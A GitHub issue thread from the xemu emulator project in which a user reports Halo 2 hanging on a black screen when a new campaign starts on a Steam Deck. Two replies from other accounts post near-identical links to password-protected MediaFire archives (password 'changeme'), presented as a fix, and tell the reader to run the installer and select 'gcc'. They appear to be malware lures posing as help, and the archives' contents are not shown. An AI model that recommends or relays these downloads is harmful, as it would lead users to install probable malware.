### ISSUE TITLE
Halo 2 hang when starting new campaign

### ISSUE THREAD

**Issue by git-tiger** [xemu-project/xemu#1769]
### Title

https://xemu.app/titles/4d530064/#Halo-2

### Bug Description

Loaded the disc, and menu is working. Created a profile. When I start the campaign, it goes to black screen, and stays stuck.
I am using xemu on Steamdeck. I have to use Steam button to exit the program. So, the Steam deck has not crashed, only Xemu.

### Expected Behavior

Expect to start the game.

### xemu Version

unknown

### System Information

Steam Deck

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by git-tiger** [comment]
Works now. Not sure if emudeck updated xemu.
